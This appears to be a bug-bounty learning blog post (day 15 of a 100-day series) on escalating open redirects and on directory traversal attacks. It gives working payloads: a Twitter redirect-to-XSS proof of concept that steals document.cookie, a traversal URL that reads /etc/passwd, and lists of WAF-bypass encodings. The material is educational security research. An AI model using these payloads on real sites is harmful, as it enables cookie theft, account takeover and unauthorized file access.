Day 15/100 Hack and Improvement

2 minute read

After readings and more content, there is a bast amount of information that we’re willing to learn. Today, for day 15 it comes with Open Redirect escalation and capabilities, and Directory Traversal Attacks with its bypasses. Happy reading!

Open Redirect Capabilities and Escalations

From Sam (CoffeeJunkie). Open redirects might seen such as low value vulnerabilities for some programs, but they actually have a real impact where the attack can be able to steal the user cookies, OAuth tokens, achieve stored, and reflected XSS, and get account takeovers. The idea of getting all these kind of scalations strongly depends on the creativity of the attacker. In the talk Giving Back to the Bug Bounty Community by zseano talk about the great chances to link OAuth misconfigurations with open redirects and stored XSS.

Source

Besides the examples for the talk from above, there are several examples of open redirect with its filters and bypasses such as the following:

Open Redirect on Twitter Leads to Reflect XSS

The attacker has the following PoC

https://dev.twitter.com/https:/%5cblackfan.ru/

As you can see, here the filter is %5c and the desired url that the attacker wants to redirect. But, how about if the attacker want’s to scalate to reflected XSS? Here is the following PoC:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/

And this is the response from the target.

HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...


<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.

As you can see the XSS is achieved due to the redirection, also the URL being redirected is being reflected on a <a> tag.

There are countless examples of this kind of attack, but something that you might find useful are the following payloads and bypasses.

  1. Payload All the Things - Open Redirect
  2. Open Redirect Cheat Sheet

Directory Traversal Attack

From Rajesh Ranjan. It is a type of attack in which an attacker might be able to view the directories which he/she should not be able to access. In this attack scenario, the attacker can simply traverse the path of filesystem and gain unauthorized access to restricted files or directories.

Exploiting Directory Traversal

There are numerous ways to exploit the Directory Traversal vulnerability, it depends the scenario, but there are few bypass i want to share with you.

Example: Suppose, there is a website https://example.com/view.php?file=image1.png has an image stored named image1.png . Here the view.php uses file paramter to retrive the content of the file from the Application server. In this case, the images are stored in var/www/images directory, so an attacker can perform a directory traverse to view the /etc/passwd file on this server. So he can craft a payload something like:

https://example.com/view.php?file=../../../etc/passwd

In most of the cases, WAF will block these attacks, but we can use several techniques to bypass the WAF

  1. Double URL encoding and Unicode Encoding
    • %2e%2e%2f
    • %252e%252e%252f
    • %c0%ae%c0%ae%c0%af
    • %uff0e%uff0e%u2215
    • %uff0e%uff0e%u2216
  2. Bypassing the Restriction of ../ so instead of using ../ , we can use the following too
    • …/./
    • ….//
    • ..;/
    • ..%00/

Directory Traversal Tool

To automate these process, we can use a tool named DotDotPwd, which is a directory traversal fuzzer, comes preinstalled with Kali Linux. Here is the Link for that tool.

Directory Traversal Bypass

I got these amazing bypass from twitter, check this out here https://www.hahwul.com/2019/09/path-traversal-pattern-of-dotdot-slash.html

Leave a comment